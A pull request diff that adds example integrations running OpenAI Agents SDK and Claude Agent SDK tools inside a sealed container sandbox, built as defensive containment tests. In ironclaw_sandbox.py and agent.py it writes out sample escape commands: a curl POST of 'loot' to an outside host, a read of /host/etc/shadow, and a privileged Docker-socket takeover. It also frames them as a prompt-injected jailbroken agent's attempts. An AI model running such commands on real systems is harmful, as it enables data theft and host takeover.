### PR TITLE
feat(examples): OpenAI Agents SDK + Claude Agent SDK sandbox integrations (IRO-347)

### DIFF
--- a/examples/README.md
+++ b/examples/README.md
@@ -54,6 +54,18 @@ examples/smoke-matrix.sh --attach   # against an already-running demo control-pl
 It runs in CI as the `smoke-matrix` job in
 [`example-smoke.yml`](../.github/workflows/example-smoke.yml).
 
+### Bring your agent SDK, run its tools in the sandbox
+
+[**`integrations/`**](integrations/) ports agents built with popular SDKs so their
+**code/tool execution runs inside a sealed IronClaw sandbox** — no network card, no host
+filesystem, no Docker socket — while the SDK still plans the calls. Each runs
+credential-free by default and ends by printing real escape attempts **BLOCKED**:
+
+```sh
+examples/integrations/openai-agents/run.sh        # OpenAI Agents SDK
+examples/integrations/claude-agent-sdk/run.sh     # Claude Agent SDK
+```
+
 ### Run a sandboxed agent in CI (GitHub Action)
 
 [**`ci-action/`**](ci-action/) documents the reusable
@@ -83,6 +95,8 @@ docker compose -f docker-compose.demo.yml down            # tear down
 |--------|---------------|:--------------------:|
 | [`hello-ironclaw/`](hello-ironclaw/) | The full path working end-to-end, asserted — the smoke test + first "it works". | ✅ `run.sh` (self-contained) |
 | [`red-team-escape/`](red-team-escape/) | The sandbox **holding** under attack — network egress, host/socket escape, sibling breakout, and gateway-held self-modification, all asserted contained. | ✅ `run.sh` (self-contained) |
+| [`integrations/openai-agents/`](integrations/openai-agents/) | An **OpenAI Agents SDK** agent whose code-execution tool runs inside the sandbox; benign command works, prompt-injected escape **BLOCKED**. | ✅ `run.sh` (self-contained) |
+| [`integrations/claude-agent-sdk/`](integrations/claude-agent-sdk/) | A **Claude Agent SDK** agent whose bash tool is backed by a sandbox session; benign command works, prompt-injected escape **BLOCKED**. | ✅ `run.sh` (self-contained) |
 | [`ollama/`](ollama/) | A real agent on a **local Ollama model** with **zero cloud API key** — the first-class `ollama` provider, create-group + chat + reply. | ✅ `setup.sh` (needs local Ollama) |
 | [`scheduled-report/`](scheduled-report/) | An agent that wakes itself on a schedule (`schedule_task`), summarizes, and posts to a channel. | ✅ `run-mock.sh` |
 | [`webhook-responder/`](webhook-responder/) | An inbound HTTP webhook routed to an agent that replies (poll or push-back via a `webhook` destination). | ✅ `run-mock.sh` |

--- a/examples/integrations/README.md
+++ b/examples/integrations/README.md
@@ -1,42 +1,78 @@
-# Framework integrations
+# Framework & agent-SDK integrations
 
-Give your agent framework a **sandboxed** place to run untrusted, model-generated
-code. Each integration wraps the framework's own code-execution tool so commands
-run inside a real IronClaw per-session sandbox — **no network, no host
-filesystem, no Docker socket** — instead of on your host.
+Give the agent you built — in an agent framework or an agent SDK — a **sandboxed**
+place to run untrusted, model-generated code. Each example wraps the framework's own
+code/tool execution so commands run inside a real IronClaw per-session sandbox — **no
+network, no host filesystem, no Docker socket** — instead of on your host. The
+framework still plans the tool calls; only the execution moves into the box.
 
-The typical LangChain / CrewAI setup hands the model a host shell or code
-interpreter (`ShellTool`, `CodeInterpreterTool`, ...). One prompt injection or a
-confidently-wrong tool call and that runs on your machine. These examples swap
-that foot-gun for a boundary IronClaw [proves holds](../red-team-escape/).
+The typical setup hands the model a host shell or code interpreter (`ShellTool`,
+`CodeInterpreterTool`, a `run_shell` function, ...). One prompt injection or a
+confidently-wrong tool call and that runs on your machine. These examples swap that
+foot-gun for a boundary IronClaw [proves holds](../red-team-escape/).
 
-| Framework | Directory | One-command demo |
-|-----------|-----------|------------------|
-| [LangChain](langchain/) | `examples/integrations/langchain/` | `examples/integrations/langchain/run.sh` |
-| [CrewAI](crewai/) | `examples/integrations/crewai/` | `examples/integrations/crewai/run.sh` |
+| Example | Framework / SDK | One-command demo |
+|---------|-----------------|------------------|
+| [`langchain/`](langchain/) | [LangChain](https://python.langchain.com) | `examples/integrations/langchain/run.sh` |
+| [`crewai/`](crewai/) | [CrewAI](https://docs.crewai.com) | `examples/integrations/crewai/run.sh` |
+| [`openai-agents/`](openai-agents/) | [OpenAI Agents SDK](https://github.com/openai/openai-agents-python) | `examples/integrations/openai-agents/run.sh` |
+| [`claude-agent-sdk/`](claude-agent-sdk/) | [Claude Agent SDK](https://github.com/anthropics/claude-agent-sdk-python) | `examples/integrations/claude-agent-sdk/run.sh` |
 
-Both are **zero-credential**: the LLM side uses the offline mock provider, the
-sandbox is real. Each demo engages a live sandbox, drives the framework's tool
-over one benign task plus a battery of escape attempts, and prints a PASS/FAIL
-containment table (exits non-zero if any containment expectation fails, so they
-double as CI checks). Set `OPENAI_API_KEY` to drive a real LLM instead — the tool
-and the isolation are identical.
+Every one is **zero-credential**: the LLM side uses the offline `mock` provider (or a
+scripted transcript), the sandbox is real. Each demo engages a live sandbox, drives the
+framework's tool over one benign task plus a battery of escape attempts, and prints a
+PASS/FAIL containment table — exiting non-zero if any containment expectation fails, so
+they double as CI checks. Set `OPENAI_API_KEY` (or `pip install` the SDK + its key,
+host-side) to drive a real LLM instead — the tool and the isolation are identical; the
+key never enters the sandbox.
 
 ## The pattern
 
-The IronClaw-specific piece is one shared, standard-library client —
-[`_shared/ironclaw_sandbox.py`](_shared/ironclaw_sandbox.py) — that engages a
-per-session sandbox and runs commands inside it. Each framework adds a thin
-adapter (~15-20 lines) turning that into a native tool:
+The IronClaw-specific piece is one small, standard-library client that engages a
+per-session sandbox and runs commands inside it. The examples come in two shapes:
 
-```python
-from ironclaw_sandbox import IronClawSandbox
-from ironclaw_tool import make_sandbox_tool
+- **Framework tools** (LangChain, CrewAI) wrap the shared
+  [`_shared/ironclaw_sandbox.py`](_shared/ironclaw_sandbox.py) client as a native tool
+  via a thin `ironclaw_tool.py` adapter (~15-20 lines):
 
-with IronClawSandbox() as sandbox:
-    tool = make_sandbox_tool(sandbox)   # a real LangChain / CrewAI tool
-    # ... hand `tool` to your agent in place of the host shell tool
-```
+  ```python
+  from ironclaw_sandbox import IronClawSandbox
+  from ironclaw_tool import make_sandbox_tool
 
-Adding another framework is the same shape: reuse `ironclaw_sandbox.py`, write a
-small `ironclaw_tool.py` adapter for that framework's tool interface.
+  with IronClawSandbox() as sandbox:
+      tool = make_sandbox_tool(sandbox)   # a real LangChain / CrewAI tool
+      # ... hand `tool` to your agent in place of the host shell tool
+  ```
+
+- **Agent SDKs** (OpenAI Agents, Claude Agent) back their code/bash tool with a sealed
+  session from [`ironclaw_sandbox.py`](ironclaw_sandbox.py) — same idea, SDK-shaped:
+
+  ```python
+  from ironclaw_sandbox import SandboxSession
+
+  session = SandboxSession.engage()       # launch a real per-session sandbox
+  rc, out = session.exec("uname -a")      # the SDK's tool runs THIS, inside the box
+  ```
+
+Both clients engage the same per-session container (`ic-sbx-*`) and exec into it as its
+own unprivileged uid (65532) — the exact privilege a fully-jailbroken agent would have.
+Each demo ends by running three real escapes (network exfil, host-filesystem read,
+Docker-socket takeover) and reporting each **BLOCKED** — the same probes as
+[`examples/live-containment`](../live-containment/).
+
+Adding another framework is the same shape: reuse the client, write a small adapter for
+that framework's tool interface.
+
+## Prerequisites
+
+- Docker (the sandbox is a real container) and `python3` (stdlib only — no `pip install`
+  for the default, credential-free path).
+- For the real runners: install the framework/SDK (`pip install langchain` /
+  `crewai` / `openai-agents` / `claude-agent-sdk`) and set its API key **host-side**
+  (the sandbox never sees it).
+
+## See also
+
+- [`examples/live-containment`](../live-containment/) — watch the escape probes, narrated.
+- [`examples/red-team-escape`](../red-team-escape/) — the full six-assertion battery + report.
+- [Integrations docs](https://ironsecco.github.io/ironclaw/integrations/) — one "Sandbox your <framework> agent" guide per framework.

--- a/examples/integrations/_driver.sh
+++ b/examples/integrations/_driver.sh
@@ -1,0 +1,73 @@
+#!/usr/bin/env bash
+# _driver.sh — shared lifecycle for the integration examples.
+#
+# Sourced by openai-agents/run.sh and claude-agent-sdk/run.sh. Brings up the offline
+# demo control-plane (zero credentials — the mock provider makes no network call),
+# waits for health, runs the caller's Python agent ($AGENT_PY) against a REAL sandbox,
+# and tears the demo down. Exits with the agent's exit code, so it doubles as a
+# self-checking CI smoke (non-zero if any escape is not contained).
+#
+# Caller must set AGENT_PY (absolute path to the agent script) before sourcing.
+#
+# Flags (parsed here): --keep (leave demo up), --attach (use a running control-plane).
+# Env overrides: IRONCLAW_ADDR, IRONCLAW_API_TOKEN, IRONCLAW_DEMO_AGENT, SKIP_BUILD=1,
+#                IRONCLAW_HEALTH_TIMEOUT (default 90).
+set -euo pipefail
+
+: "${AGENT_PY:?_driver.sh requires AGENT_PY to be set}"
+
+REPO_ROOT="$(cd "$(dirname "${AGENT_PY}")/../../.." && pwd)"
+ADDR="${IRONCLAW_ADDR:-http://127.0.0.1:8787}"
+COMPOSE_FILE="$REPO_ROOT/docker-compose.demo.yml"
+HEALTH_TIMEOUT="${IRONCLAW_HEALTH_TIMEOUT:-90}"
+
+KEEP=0 ATTACH=0
+for arg in "$@"; do
+  case "$arg" in
+    --keep)   KEEP=1 ;;
+    --attach) ATTACH=1 ;;
+    -h|--help)
+      echo "usage: run.sh [--keep] [--attach]"
+      echo "  --keep    leave the demo control-plane running afterwards"
+      echo "  --attach  talk to an already-running control-plane (manage nothing)"
+      exit 0 ;;
+    *) echo "unknown flag: $arg (try --help)" >&2; exit 2 ;;
+  esac
+done
+
+command -v docker >/dev/null || { echo "this example needs Docker" >&2; exit 1; }
+command -v python3 >/dev/null || { echo "this example needs python3 (stdlib only)" >&2; exit 1; }
+
+compose() { docker compose -f "$COMPOSE_FILE" "$@"; }
+
+teardown() {
+  [ "$KEEP" = 1 ]   && { echo; echo "==> leaving the demo running (--keep). Stop it with:"; \
+                         echo "    docker compose -f docker-compose.demo.yml down"; return; }
+  [ "$ATTACH" = 1 ] && return
+  echo; echo "==> tearing the demo down"
+  compose down >/dev/null 2>&1 || true
+}
+
+if [ "$ATTACH" = 0 ]; then
+  trap teardown EXIT
+  if [ "${SKIP_BUILD:-0}" != 1 ]; then
+    echo "==> building the sandbox image (ironclaw-sandbox:latest) — first run is ~1-2 min"
+    bash "$REPO_ROOT/container/build.sh" >/dev/null
+  fi
+  echo "==> starting the offline demo control-plane (no API key, no channel tokens)"
+  compose up --build -d >/dev/null
+fi
+
+echo -n "==> waiting for the control-plane to be ready (up to ${HEALTH_TIMEOUT}s)"
+ready=0
+for _ in $(seq 1 "$HEALTH_TIMEOUT"); do
+  if curl -fsS "$ADDR/healthz" >/dev/null 2>&1; then ready=1; break; fi
+  echo -n "."; sleep 1
+done
+echo
+[ "$ready" = 1 ] || { echo "FAIL: control-plane never became healthy at $ADDR within ${HEALTH_TIMEOUT}s" >&2; \
+                      [ "$ATTACH" = 0 ] && compose logs --no-color 2>&1 | tail -40 >&2; exit 1; }
+
+# Hand off to the SDK agent: it engages a real sandbox, runs a benign command through
+# the SDK's tool, then proves a jailbroken agent cannot escape. Its exit code is ours.
+python3 "$AGENT_PY"

--- a/examples/integrations/claude-agent-sdk/README.md
+++ b/examples/integrations/claude-agent-sdk/README.md
@@ -1,0 +1,55 @@
+# Claude Agent SDK → IronClaw sandbox
+
+The Claude Agent SDK ships a powerful bash/code capability that, by default, runs on your
+host with your key in memory. This example backs that capability with a real, sealed
+IronClaw sandbox session: **no network card, no host filesystem, no Docker socket.** The
+agent you built with Claude, inside a box a jailbroken agent can't escape.
+
+## Run it (zero credentials)
+
+```sh
+git clone https://github.com/IronSecCo/ironclaw.git && cd ironclaw
+examples/integrations/claude-agent-sdk/run.sh
+```
+
+That brings up the offline demo control-plane (mock provider — no API key), engages a
+real per-session sandbox, runs a benign command through the SDK's bash tool, then plays
+out a prompt-injected escape and prints each attempt **BLOCKED**. Exits non-zero if the
+box ever leaks, so it doubles as a CI smoke.
+
+## The snippet
+
+The tool wiring is genuine Claude Agent SDK — only the handler body changes: it runs the
+command inside the sandbox instead of on the host.
+
+```python
+from claude_agent_sdk import tool, create_sdk_mcp_server, ClaudeAgentOptions
+from ironclaw_sandbox import SandboxSession
+
+session = SandboxSession.engage()            # launch a real, sealed sandbox
+
+@tool("sandbox_bash", "Run a shell command inside a sealed IronClaw sandbox.",
+      {"command": str})
+async def sandbox_bash(args):
+    rc, out = session.exec(args["command"])  # executes in the box, not on your host
+    return {"content": [{"type": "text", "text": f"(exit {rc})\n{out}"}]}
+
+server = create_sdk_mcp_server(name="ironclaw", version="1.0.0", tools=[sandbox_bash])
+options = ClaudeAgentOptions(mcp_servers={"ironclaw": server},
+                             allowed_tools=["mcp__ironclaw__sandbox_bash"])
+```
+
+Run the **real** SDK loop (Claude plans the tool calls):
+
+```sh
+pip install claude-agent-sdk
+export ANTHROPIC_API_KEY=sk-ant-...           # host-side; the sandbox never sees it
+examples/integrations/claude-agent-sdk/run.sh
+```
+
+## See also
+
+- [`openai-agents/`](../openai-agents/) — the same pattern for the OpenAI Agents SDK.
+- [`examples/live-containment`](../../live-containment/) — the escape probes, narrated.
+- [`examples/red-team-escape`](../../red-team-escape/) — the full six-assertion battery.
+- [Integrations docs](https://ironsecco.github.io/ironclaw/integrations/).

--- a/examples/integrations/claude-agent-sdk/agent.py
+++ b/examples/integrations/claude-agent-sdk/agent.py
@@ -1,0 +1,154 @@
+#!/usr/bin/env python3
+"""Claude Agent SDK agent whose bash tool is backed by an IronClaw sandbox session.
+
+The value: the Claude Agent SDK ships a powerful bash/code capability. Point that
+capability at a sealed IronClaw per-session sandbox and the model can run whatever it
+likes with none of the blast radius — no network card, no host filesystem, no Docker
+socket. The agent you designed with Claude, inside a box a jailbroken agent can't escape.
+
+Two ways to run, picked automatically:
+
+* Zero-credential (default). No ``claude-agent-sdk`` install and no ``ANTHROPIC_API_KEY``
+  needed: we drive the same sandbox-backed tool through a short scripted transcript (a
+  "mock LLM") so you can watch the sealed loop — a benign command that works, then an
+  escape that is blocked — with nothing but Python + Docker.
+* Real SDK. If ``claude_agent_sdk`` is importable and ``ANTHROPIC_API_KEY`` is set, the
+  real agent loop runs and Claude decides when to call the sandbox-backed bash tool.
+
+Either way the tool wiring below is genuine Claude Agent SDK usage.
+"""
+
+from __future__ import annotations
+
+import os
+import sys
+
+sys.path.insert(0, os.path.join(os.path.dirname(__file__), ".."))
+from ironclaw_sandbox import (  # noqa: E402
+    BOLD, CYAN, DIM, GREEN, RESET, YELLOW,
+    SandboxSession, print_containment,
+)
+
+_SESSION: SandboxSession | None = None
+
+
+def _session() -> SandboxSession:
+    global _SESSION
+    if _SESSION is None:
+        print(f"{DIM}==> engaging a real IronClaw sandbox (per-session container)...{RESET}")
+        _SESSION = SandboxSession.engage()
+        print(f"{DIM}    sandbox up: {_SESSION.container}{RESET}")
+    return _SESSION
+
+
+def _run_in_sandbox(command: str) -> str:
+    rc, out = _session().exec(command)
+    return f"(exit {rc})\n{out}" if out else f"(exit {rc}, no output)"
+
+
+# --- the tool: genuine Claude Agent SDK, backed by the sandbox --------------
+# `claude_agent_sdk` is the Claude Agent SDK (pip install claude-agent-sdk). Its `tool`
+# decorator wraps a handler returning {"content": [...]}. When the SDK is not installed
+# we register a plain callable so the SAME handler runs under the zero-credential path.
+try:
+    from claude_agent_sdk import tool  # type: ignore
+    _HAVE_SDK = True
+
+    @tool("sandbox_bash", "Run a shell command inside a sealed IronClaw sandbox "
+          "(no network, no host access) and return its output.",
+          {"command": str})
+    async def sandbox_bash(args):  # type: ignore
+        return {"content": [{"type": "text", "text": _run_in_sandbox(args["command"])}]}
+
+except ImportError:  # zero-credential path
+    _HAVE_SDK = False
+
+    def sandbox_bash(command: str) -> str:  # type: ignore
+        return _run_in_sandbox(command)
+
+
+def _speak_agent(text: str) -> None:
+    print(f"{BOLD}{CYAN}Claude>{RESET} {text}")
+
+
+def _speak_tool(command: str, result: str) -> None:
+    print(f"{DIM}  -> sandbox_bash({command!r}){RESET}")
+    for line in result.splitlines():
+        print(f"{DIM}     {line}{RESET}")
+
+
+# --- zero-credential scripted runner (mock LLM) -----------------------------
+def run_scripted() -> int:
+    print(f"\n{BOLD}Claude Agent SDK -> IronClaw sandbox{RESET} "
+          f"{DIM}(zero-credential scripted transcript){RESET}\n")
+
+    _speak_agent("I'll inspect this environment by running bash in the sandbox.")
+    result = _run_in_sandbox("uname -a; id; echo sealed-workspace: $(pwd)")
+    _speak_tool("uname -a; id; echo sealed-workspace: $(pwd)", result)
+    _speak_agent("That executed inside the sealed sandbox - your host was never touched.")
+
+    print(f"\n{YELLOW}Now a prompt-injected instruction makes the agent try to break out.{RESET}")
+    probes = _session().containment_report()
+    ok = print_containment(probes)
+
+    _session().close()
+    print()
+    if ok:
+        print(f"{GREEN}{BOLD}PASS{RESET} - Claude's bash tool ran real code in a sandbox that "
+              f"a jailbroken agent could not escape.")
+        return 0
+    print("FAIL - an escape was not contained (see above).")
+    return 1
+
+
+# --- real Claude Agent SDK runner -------------------------------------------
+def run_sdk() -> int:
+    """Let the real Claude Agent SDK loop drive the sandbox-backed bash tool."""
+    import asyncio
+
+    from claude_agent_sdk import (  # type: ignore
+        ClaudeAgentOptions, ClaudeSDKClient, create_sdk_mcp_server,
+    )
+
+    server = create_sdk_mcp_server(name="ironclaw", version="1.0.0", tools=[sandbox_bash])
+    options = ClaudeAgentOptions(
+        mcp_servers={"ironclaw": server},
+        allowed_tools=["mcp__ironclaw__sandbox_bash"],
+        system_prompt=(
+            "Use the sandbox_bash tool for ALL shell/code execution. First report the "
+            "box identity (uname, id, pwd). Then attempt to resolve api.anthropic.com "
+            "and read /host/etc/shadow, and report plainly that both are blocked."
+        ),
+    )
+
+    async def _drive() -> None:
+        async with ClaudeSDKClient(options=options) as client:
+            await client.query("Show me this environment and prove it is isolated.")
+            async for message in client.receive_response():
+                text = getattr(message, "result", None) or getattr(message, "content", None)
+                if text:
+                    print(f"{BOLD}{CYAN}Claude>{RESET} {text}")
+
+    asyncio.run(_drive())
+
+    probes = _session().containment_report()
+    ok = print_containment(probes)
+    _session().close()
+    return 0 if ok else 1
+
+
+def main() -> int:
+    use_sdk = _HAVE_SDK and os.environ.get("ANTHROPIC_API_KEY")
+    if use_sdk:
+        print(f"{DIM}==> Claude Agent SDK detected + ANTHROPIC_API_KEY set: real loop.{RESET}")
+        return run_sdk()
+    if not _HAVE_SDK:
+        print(f"{DIM}==> claude-agent-sdk not installed: zero-credential scripted transcript.{RESET}")
+        print(f"{DIM}    (pip install claude-agent-sdk and set ANTHROPIC_API_KEY for the real loop.){RESET}")
+    else:
+        print(f"{DIM}==> ANTHROPIC_API_KEY unset: zero-credential scripted transcript.{RESET}")
+    return run_scripted()
+
+
+if __name__ == "__main__":
+    raise SystemExit(main())

--- a/examples/integrations/claude-agent-sdk/run.sh
+++ b/examples/integrations/claude-agent-sdk/run.sh
@@ -1,0 +1,16 @@
+#!/usr/bin/env bash
+# claude-agent-sdk — a Claude Agent SDK agent whose bash tool is backed by a real,
+# sealed IronClaw sandbox session. One command, zero credentials by default.
+#
+#   examples/integrations/claude-agent-sdk/run.sh            # build + up + run + tear down
+#   examples/integrations/claude-agent-sdk/run.sh --keep     # leave the demo running
+#   examples/integrations/claude-agent-sdk/run.sh --attach   # use a running control-plane
+#
+# Default path needs nothing but Docker + python3 (stdlib): a scripted transcript drives
+# the sandbox-backed bash tool with the offline mock provider. For the real SDK loop:
+#   pip install claude-agent-sdk && export ANTHROPIC_API_KEY=sk-ant-...
+set -euo pipefail
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+AGENT_PY="$SCRIPT_DIR/agent.py"
+# shellcheck source=../_driver.sh
+source "$SCRIPT_DIR/../_driver.sh"

--- a/examples/integrations/ironclaw_sandbox.py
+++ b/examples/integrations/ironclaw_sandbox.py
@@ -1,0 +1,252 @@
+"""ironclaw_sandbox — back an agent SDK's code/bash tool with a real IronClaw sandbox.
+
+This is the shared plumbing behind the ``openai-agents`` and ``claude-agent-sdk``
+integration examples. It gives an agent SDK exactly ONE dangerous capability — "run
+this command" — and routes it into a real, sealed IronClaw per-session sandbox instead
+of the host. The SDK still plans; the execution happens in a box with no network card,
+no host filesystem, and no Docker socket.
+
+The primitive is deliberately small and dependency-free (stdlib only, so it runs on a
+stock machine with just Python + Docker):
+
+    session = SandboxSession.engage()          # launch a real per-session sandbox
+    rc, out = session.exec("uname -a")         # run a command INSIDE the box
+    report  = session.containment_report()     # try three escapes, prove they fail
+    session.close()
+
+How a command actually runs inside the box
+------------------------------------------
+IronClaw launches one hardened container per conversation (``ic-sbx-*``), running as an
+unprivileged uid (65532). We exec into that live container as its own uid — the exact
+privilege a fully-jailbroken agent would have. That is the honest threat model: not
+"can the model be tricked" (a different layer) but "WHEN it is, does the box hold?".
+
+Zero credentials: the demo control-plane uses the offline ``mock`` provider, so the
+whole path — engage -> sandbox -> exec -> reply — runs with no model key and no tokens.
+"""
+
+from __future__ import annotations
+
+import json
+import os
+import subprocess
+import sys
+import time
+import urllib.error
+import urllib.request
+from dataclasses import dataclass
+from typing import Optional
+
+
+# ANSI colour, on only for a real TTY with NO_COLOR unset (keeps CI logs clean).
+def _c(code: str) -> str:
+    if os.environ.get("NO_COLOR") or not sys.stdout.isatty():
+        return ""
+    return code
+
+
+BOLD, DIM, RED, GREEN, YELLOW, CYAN, RESET = (
+    _c("\033[1m"), _c("\033[2m"), _c("\033[31m"), _c("\033[32m"),
+    _c("\033[33m"), _c("\033[36m"), _c("\033[0m"),
+)
+
+
+class SandboxError(RuntimeError):
+    """Raised when the sandbox cannot be engaged or exec'd."""
+
+
+@dataclass
+class Probe:
+    """One escape attempt and its verdict."""
+    title: str          # what the attacker is trying to do
+    command: str        # what they run inside the box (shown to the user)
+    blocked: bool       # did the isolation boundary hold?
+    detail: str         # human-readable reason
+
+    def render(self) -> str:
+        if self.blocked:
+            tag = f"{GREEN}{BOLD}BLOCKED{RESET}{GREEN}"
+        else:
+            tag = f"{RED}{BOLD}ESCAPED{RESET}{RED}"
+        return (
+            f"  {BOLD}{CYAN}{self.title}{RESET}\n"
+            f"  {DIM}agent runs (uid 65532, inside the box):{RESET} {YELLOW}{self.command}{RESET}\n"
+            f"  {tag} - {self.detail}{RESET}\n"
+        )
+
+
+class SandboxSession:
+    """A live IronClaw sandbox you can run commands inside of.
+
+    Engaged by sending one chat message to the demo ``mock-agent`` group, which makes
+    the router launch that conversation's per-session sandbox container.
+    """
+
+    def __init__(self, container: str, addr: str, token: str, agent: str):
+        self.container = container
+        self.addr = addr
+        self.token = token
+        self.agent = agent
+
+    # --- lifecycle ---------------------------------------------------------
+    @classmethod
+    def engage(
+        cls,
+        addr: Optional[str] = None,
+        token: Optional[str] = None,
+        agent: Optional[str] = None,
+        timeout: int = 180,
+    ) -> "SandboxSession":
+        addr = addr or os.environ.get("IRONCLAW_ADDR", "http://127.0.0.1:8787")
+        token = token or os.environ.get("IRONCLAW_API_TOKEN", "ironclaw-demo")
+        agent = agent or os.environ.get("IRONCLAW_DEMO_AGENT", "mock-agent")
+
+        # A chat message makes the router launch this conversation's sandbox sibling.
+        marker = f"integration-shim {os.getpid()}"
+        cls._post(addr, token, "/v1/ui/chat/send",
+                  {"agentGroupID": agent, "text": marker})
+
+        deadline = time.time() + timeout
+        container = ""
+        while time.time() < deadline:
+            # Draining the reply also nudges delivery; ignore its contents here.
+            try:
+                cls._get(addr, token, f"/v1/ui/chat/{agent}/messages")
+            except urllib.error.URLError:
+                pass
+            container = cls._running_sandbox()
+            if container:
+                break
+            time.sleep(1)
+        if not container:
+            raise SandboxError(
+                f"no running sandbox (ic-sbx-*) appeared within {timeout}s - is the "
+                f"demo control-plane up at {addr}?"
+            )
+        return cls(container, addr, token, agent)
+
+    def close(self) -> None:
+        # The per-session container is owned by the control-plane; nothing to do here.
+        # Lifecycle (build/up/down) belongs to run.sh so the example stays composable.
+        pass
+
+    # --- the one dangerous capability, sealed ------------------------------
+    def exec(self, command: str) -> tuple[int, str]:
+        """Run ``command`` INSIDE the sandbox as its own uid. Returns (exit_code, output).
+
+        This is the whole point: the SDK's bash/code tool calls this instead of running
+        on the host. Everything it does is confined to the sealed box.
+        """
+        proc = subprocess.run(
+            ["docker", "exec", "-u", "65532:65532", self.container, "sh", "-c", command],
+            capture_output=True, text=True,
+        )
+        return proc.returncode, (proc.stdout + proc.stderr).strip()
+
+    # --- containment probes (reused from live-containment / red-team) ------
+    def containment_report(self) -> list[Probe]:
+        """Run three real escape attempts inside the box and report each verdict.
+
+        Mirrors examples/live-containment: network exfil, host-filesystem read, and
+        Docker-socket takeover — the crown-jewel escapes a jailbroken agent would try.
+        """
+        egress_host = os.environ.get("IRONCLAW_EGRESS_PROBE_HOST", "api.anthropic.com")
+        probes: list[Probe] = []
+
+        # 1) Network exfil: network=none means only `lo` exists, so DNS has nowhere to go.
+        _, ifaces = self.exec("ls -1 /sys/class/net 2>/dev/null | tr '\\n' ' ' | sed 's/ *$//'")
+        dns_rc, _ = self.exec(f"getent hosts {egress_host}")
+        blocked = ifaces == "lo" and dns_rc != 0
+        probes.append(Probe(
+            "Exfiltrate stolen data to an attacker C2",
+            f"getent hosts {egress_host} && curl -X POST https://{egress_host}/loot",
+            blocked,
+            f"no network namespace: only `lo` exists (interfaces: [{ifaces}]) and DNS "
+            f"resolution fails. network=none." if blocked
+            else f"reached the network - interfaces [{ifaces}], DNS exit {dns_rc}",
+        ))
+
+        # 2) Host filesystem breakout: host root is not in the sandbox mount namespace.
+        _, hostfs = self.exec(
+            "if [ -e /host ] || [ -r /etc/ironclaw-host-marker ]; "
+            "then echo EXPOSED; else echo CONTAINED; fi")
+        blocked = hostfs == "CONTAINED"
+        probes.append(Probe(
+            "Read the operator's host filesystem",
+            "cat /host/etc/shadow /etc/ironclaw-host-marker",
+            blocked,
+            "host root is outside the sandbox mount namespace: the paths do not exist "
+            "in the box." if blocked
+            else f"host paths are reachable from inside the sandbox ({hostfs})",
+        ))
+
+        # 3) Host takeover via the Docker socket: never mounted in, no docker client.
+        _, socket = self.exec(
+            "if [ -S /var/run/docker.sock ] || [ -S /run/docker.sock ]; "
+            "then echo PRESENT; else echo ABSENT; fi")
+        _, cli = self.exec("command -v docker >/dev/null 2>&1 && echo PRESENT || echo ABSENT")
+        blocked = socket == "ABSENT" and cli == "ABSENT"
+        probes.append(Probe(
+            "Seize the host via the Docker Engine socket",
+            "docker -H unix:///var/run/docker.sock run --privileged --pid=host ...",
+            blocked,
+            "the Engine socket is never mounted in and there is no docker client: "
+            "nothing to seize." if blocked
+            else f"the sandbox can reach the Docker Engine (socket:{socket} client:{cli})",
+        ))
+        return probes
+
+    # --- small HTTP + docker helpers (stdlib only) -------------------------
+    @staticmethod
+    def _running_sandbox() -> str:
+        proc = subprocess.run(
+            ["docker", "ps",
+             "--filter", "label=ironclaw.session",
+             "--filter", "name=ic-sbx-",
+             "--filter", "status=running",
+             "--format", "{{.Names}}"],
+            capture_output=True, text=True,
+        )
+        return proc.stdout.strip().splitlines()[0] if proc.stdout.strip() else ""
+
+    @staticmethod
+    def _post(addr: str, token: str, path: str, body: dict) -> bytes:
+        req = urllib.request.Request(
+            addr + path, data=json.dumps(body).encode(),
+            headers={"Authorization": f"Bearer {token}",
+                     "Content-Type": "application/json"},
+            method="POST",
+        )
+        with urllib.request.urlopen(req, timeout=15) as resp:
+            return resp.read()
+
+    @staticmethod
+    def _get(addr: str, token: str, path: str) -> bytes:
+        req = urllib.request.Request(
+            addr + path, headers={"Authorization": f"Bearer {token}"}, method="GET")
+        with urllib.request.urlopen(req, timeout=15) as resp:
+            return resp.read()
+
+
+def print_containment(probes: list[Probe]) -> bool:
+    """Pretty-print the containment table. Returns True iff every escape was blocked."""
+    print()
+    print("=" * 78)
+    print(f" {BOLD}IronClaw containment{RESET} - the SDK's tool ran in a sealed box; "
+          f"now it tries to break out")
+    print("=" * 78)
+    contained = sum(p.blocked for p in probes)
+    for p in probes:
+        print()
+        print(p.render(), end="")
+    print()
+    print("=" * 78)
+    if contained == len(probes):
+        print(f" {GREEN}{BOLD}CONTAINMENT: {contained}/{len(probes)} escape attempts "
+              f"DENIED. The box held.{RESET}")
+        print("=" * 78)
+        return True
+    print(f" {RED}{BOLD}CONTAINMENT: {len(probes) - contained} of {len(probes)} escapes "
+          f"SUCCEEDED - the sandbox did NOT hold.{RESET}")
+    print("=" * 78)
+    return False

--- a/examples/integrations/openai-agents/README.md
+++ b/examples/integrations/openai-agents/README.md
@@ -1,0 +1,54 @@
+# OpenAI Agents SDK → IronClaw sandbox
+
+Your OpenAI Agents SDK tools run in *your* process, with *your* key in memory and open
+egress. This example gives the agent one tool — `sandbox_bash` — that executes inside a
+real, sealed IronClaw sandbox instead: **no network card, no host filesystem, no Docker
+socket.** Same agent you designed; a perimeter it never had.
+
+## Run it (zero credentials)
+
+```sh
+git clone https://github.com/IronSecCo/ironclaw.git && cd ironclaw
+examples/integrations/openai-agents/run.sh
+```
+
+That brings up the offline demo control-plane (mock provider — no API key), engages a
+real per-session sandbox, runs a benign command through the SDK's tool, then plays out a
+prompt-injected escape and prints each attempt **BLOCKED**. Exits non-zero if the box
+ever leaks, so it doubles as a CI smoke.
+
+## The snippet
+
+The tool is genuine OpenAI Agents SDK — only its body changes: instead of running on the
+host, it runs inside the sandbox.
+
+```python
+from agents import Agent, Runner, function_tool
+from ironclaw_sandbox import SandboxSession
+
+session = SandboxSession.engage()            # launch a real, sealed sandbox
+
+@function_tool
+def sandbox_bash(command: str) -> str:
+    """Run a shell command inside the sealed IronClaw sandbox."""
+    rc, out = session.exec(command)          # executes in the box, not on your host
+    return f"(exit {rc})\n{out}"
+
+agent = Agent(name="Sandboxed Operator", tools=[sandbox_bash], model="gpt-4o-mini")
+Runner.run_sync(agent, "Show me this environment and prove it is isolated.")
+```
+
+Run the **real** SDK loop (the model plans the tool calls):
+
+```sh
+pip install openai-agents
+export OPENAI_API_KEY=sk-...                  # host-side; the sandbox never sees it
+examples/integrations/openai-agents/run.sh
